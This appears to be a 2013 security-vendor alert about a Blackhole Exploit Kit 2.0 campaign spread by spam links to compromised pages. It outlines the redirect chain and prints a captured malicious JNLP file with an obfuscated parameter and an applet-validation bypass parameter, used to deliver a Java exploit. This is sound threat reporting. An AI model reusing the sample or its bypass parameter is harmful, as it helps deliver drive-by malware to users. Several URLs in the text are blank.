Security Alert 2013-06-06:Blackhole Exploit Kit 2.0 outbreak again!

According to Exploit Kit 2.0 infected many websites named "*/linkendorse.html".

It often uses large SPAM mails to spread the malicious links!

AegisLab also collected many similar malicious links.

When you connect to these victim websites,they will redircet you to hxxp://

We can see "Redirecting to Complain details… Please wait…",the sentence is well-known Blackhole Exploit Kit's pattern!

For more details,you can refer to this.


Then,the landing page detects your browser and plugin information,redirect you to next hopping sites.

If your browser is vulnerable,you will download a jnlp file:hxxp://


<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0" xmlns:jfx="">
    <j2se version="1.6+" href=""/>
    <jar href="/news/suspect-someplace.php?tovx=wup&hld=mzhbvvdd" main="true"/>
<applet-desc name="Jn" main-class="&#119;h" width="1" height="1">
 <param value="true" name="__applet_ssv_validated"></param>
 <param name="val" value="Dyy"></param>
 <param name="prime" value="3Ojjto-8oeMVy8oA?-Ke3l8oywoeyjoe_ijiKi3e%ymit0e3-V%ew3D3x_.b6DO60Oh_O6oO6tRVeb1hO6CO6-O6qO6oO11O11O6AOh_O6ARtb6.RKeb8R0ob_"></param>

Otherwise,you will be redirected to Google search "linkedin".


Above jnlp will get a JAR. The JAR file includes Java exploit to execute PE or PDF.

The final download site is:



Detection rate in VirusTotal:7/47

AegisLab WebGuard has blocked [D]onlinedatingblueprint.netwe urge our customer to keep WebGuard signature up to date.


[2013.06.07 update]

New:"*/natpay.html" leads to "hxxp://"

AegisLab WebGuard also has blocked [D] !


Leave a Reply

Your email address will not be published. Required fields are marked *